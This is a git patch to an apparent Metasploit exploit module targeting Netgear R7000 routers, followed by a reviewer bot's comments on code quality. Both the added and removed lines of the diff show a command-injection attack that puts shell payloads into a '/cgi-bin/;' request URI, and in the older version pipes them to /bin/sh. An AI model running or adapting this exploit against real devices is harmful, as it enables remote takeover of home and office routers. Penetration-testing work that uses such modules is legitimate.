From 63d1de9acd0286b4b64ceac9cb0908eb3e7f06f0 Mon Sep 17 00:00:00 2001
From: Carter
Date: Fri, 17 Feb 2017 18:29:46 -0500
Subject: [PATCH] Updates from review

Also testing some things, line 84 and 85 mostly
---
 .../linux/http/netgear_r7000_cgibin_exec.rb | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
index 60a3b72d47..240e4f22fe 100644
--- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
+++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
@@ -38,8 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'Payload' =>
 {
 'Space' => 1024,
- 'DisableNops' => true
- #'EncoderType' => Msf::Encoder::Type::CmdUnixIfs,
+ 'DisableNops' => true,
+ 'BadChars' => "\x20"
 }
 ))
@@ -81,16 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
 # Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit
 def exploit
 is_vuln = check
- cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
- str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
+ cmd = payload.encoded # .unpack("C*").map{|c| "\\x%.2x" % c}.join
+ #str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
 print_status('Sending encoded command...')
- vprint_status("Encoded command: #{str}")
- send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
+ vprint_status("Encoded command: #{cmd}")
+ send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
 print_status('Giving the handler time to run...')
 handler
- select(nil, nil, nil, 10.0)
+ sleep(10)
 end
 end
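Review bot: `is_vuln = check` in the second hunk is assigned but never read, so `exploit` proceeds regardless of what `check` reports; either act on the result before sending the request or drop the local to avoid suggesting a gate that does not exist. The same hunk leaves the previous encoding path behind as comments (`cmd = payload.encoded # .unpack("C*")…` and the fully commented `#str = …` line); commented-out code should be removed rather than kept, since version control already preserves it, and the commit message itself describes the state as "testing some things". With the hex-escaping gone, the `vprint_status("Encoded command: #{cmd}")` label now describes the raw `payload.encoded` string, so a label such as `"Payload: #{cmd}"` would be more accurate. The `def exploit` body is fully within the hunk; the enclosing class begins outside it.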